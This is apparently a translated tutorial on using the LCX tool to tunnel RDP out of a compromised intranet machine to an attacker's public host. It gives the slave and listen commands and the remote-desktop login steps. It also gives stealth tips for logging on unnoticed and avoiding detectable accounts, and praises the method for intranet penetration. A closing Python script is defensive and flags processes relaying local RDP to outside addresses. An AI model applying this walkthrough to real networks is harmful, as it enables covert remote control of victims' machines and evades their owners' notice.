Attack and Defense practices: Use LCX for Intranet port forwarding

Source: Internet
Author: User

In theory, any computer connected to a network is reachable, but in practice access is often difficult because of technical limitations or other reasons. For example, a computer in a LAN may expose only a Web service, and that service is available only to Intranet users; Internet users have no direct access. To let Internet users reach services inside the LAN, operations such as port forwarding must be performed. Port forwarding is often used when intruding into an Intranet, and it is very convenient, especially when you need to log on to remote terminal services.

Lcx.exe is a port forwarding tool. It forwards port 3389 of an Intranet host A to a host B that has an Internet IP address, so that connecting to port 3389 on B is equivalent to connecting to port 3389 on host A. LCX is mostly used when the computers under control (bots) are inside an Intranet. Such computers may be running trojan programs; although they can be controlled, it is not easy to log on to them with a remote terminal for management. In many cases, therefore, port 3389 is enabled on the controlled computer and then forwarded through LCX or a similar program, so that the remote terminal of the controlled computer can be reached from the local machine for management and use.

1. Determine the IP address of the controlled computer

Enable the remote terminal on the controlled computer and run the "ipconfig /all" command to check the network configuration. Figure 1 shows that the IP address of the computer is "192.168.80.129".

Figure 1: Determine the IP address of the controlled computer

2. Execute the port forwarding command on the controlled computer

Run "lcx -slave 218.69.*.* 51 192.168.80.129 3389" on the controlled computer, as shown in Figure 2. Some prompts are displayed after the command runs. If the output shows "make a connection to 218.69.*.*:51", port forwarding is working correctly.

Figure 2: Run the forward command on the controlled computer

Description

LCX has three commands. The first command (lcx -listen 51 3389) is executed on a computer with an independent Internet IP address. It listens on port 51 of the local machine, and this port receives the data forwarded from port 3389 of the controlled computer. The second command (lcx -slave 218.69.*.* 51 192.168.80.129 3389) forwards port 3389 of the local IP address 192.168.80.129 to the remote address "218.69.*.*". The third command is port redirection.

3. Execute the listening command on the local machine

Run the "lcx -listen 51 3389" command in the directory that contains lcx.exe to listen on port 51. After listening starts successfully, the data shown in Figure 3 is displayed.

Figure 3: Listening on port 51 on the local machine

Note:

(1) The listening port on the local machine must be an unused port. You can run the command netstat -an | find "51" to check the port; if no result is displayed, port 51 can be used for listening.

(2) After the controlled computer establishes a connection with the local machine, the connection data is displayed continuously, as shown in Figure 4. If no data is sent or received, the connection has failed.

Figure 4: Successful connection

4. Log on from the local machine using a remote terminal

Enter the "mstsc" command at the DOS prompt to open the remote terminal connector, enter "127.0.0.1", and then click "Connect" to connect to the remote terminal. After the logon interface appears, enter the user name and password respectively. After verification passes, you can remotely access the desktop of the controlled computer, as shown in Figure 5. Enter the "ipconfig /all" and "net user" commands to view the network configuration and user information.

Figure 5: Remote logon to the controlled computer

Note:

(1) If the controlled computer is a server, you can directly log on to the computer. If the controlled computer is a Windows XP system, it is best to select a time when the user is not logged on to the computer; otherwise it is easy to be found.

(2) Do not casually create an account on the controlled computer, especially on Windows XP. After an account is created, it is displayed on the logon page immediately.

5. View local connections

When "netstat -an" is used on the controlled computer to view all current connections, you can see that the controlled computer is connected to its own remote terminal, as shown in Figure 6. The actual port 3389 is connected to port 51 of the local machine.

Figure 6: View the actual network connection

In this case, through the LCX port forwarding program, the local computer can be successfully connected to the Intranet of the controlled computer, which can be easily managed remotely. It is particularly useful for Intranet penetration.
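The connection pattern described in step 5 is also what a defender can look for: one process holding both a client connection into the host's own port 3389 and a connection to an outside address. The following is an added example, not part of the original article, that checks `netstat -ano` output for that pairing; the sample output, the PIDs and the address 203.0.113.10 are constructed for illustration.

```python
import ipaddress
from collections import defaultdict

# Constructed `netstat -ano` output from the controlled host (192.168.80.129).
# 203.0.113.10 is a documentation address standing in for the masked 218.69.*.*.
SAMPLE = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1012
  TCP    192.168.80.129:1045    203.0.113.10:51        ESTABLISHED     2316
  TCP    192.168.80.129:1046    192.168.80.129:3389    ESTABLISHED     2316
  TCP    192.168.80.129:3389    192.168.80.129:1046    ESTABLISHED     1012
  TCP    192.168.80.129:1050    192.168.80.20:445      ESTABLISHED     4
"""

def parse_established(text):
    """Yield (local_ip, remote_ip, remote_port, pid) for ESTABLISHED TCP rows."""
    for line in text.splitlines():
        f = line.split()
        if len(f) != 5 or f[0] != "TCP" or f[3] != "ESTABLISHED":
            continue
        local_ip = f[1].rsplit(":", 1)[0].strip("[]")
        remote_ip, remote_port = f[2].rsplit(":", 1)
        yield local_ip, remote_ip.strip("[]"), int(remote_port), int(f[4])

def find_rdp_relays(text, rdp_port=3389):
    """Return [(pid, [external endpoints])] for processes that hold a client
    connection into this host's own RDP port and a connection to another host."""
    rows = list(parse_established(text))
    local_ips = {r[0] for r in rows}

    def is_local(ip):
        return ip in local_ips or ipaddress.ip_address(ip).is_loopback

    to_own_rdp = defaultdict(bool)
    external = defaultdict(set)
    for _, remote_ip, remote_port, pid in rows:
        if is_local(remote_ip):
            # Remote port 3389 means this PID is the client side of the loop;
            # the RDP service's own row has 3389 as its *local* port instead.
            to_own_rdp[pid] |= remote_port == rdp_port
        else:
            external[pid].add(f"{remote_ip}:{remote_port}")
    return [(pid, sorted(external[pid]))
            for pid in sorted(to_own_rdp) if to_own_rdp[pid] and external[pid]]

if __name__ == "__main__":
    for pid, peers in find_rdp_relays(SAMPLE):
        print(f"PID {pid} bridges local RDP to {', '.join(peers)}")
```

An ordinary inbound RDP session from another machine does not match, because the only process involved is the RDP service itself, whose rows carry 3389 as the local port.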
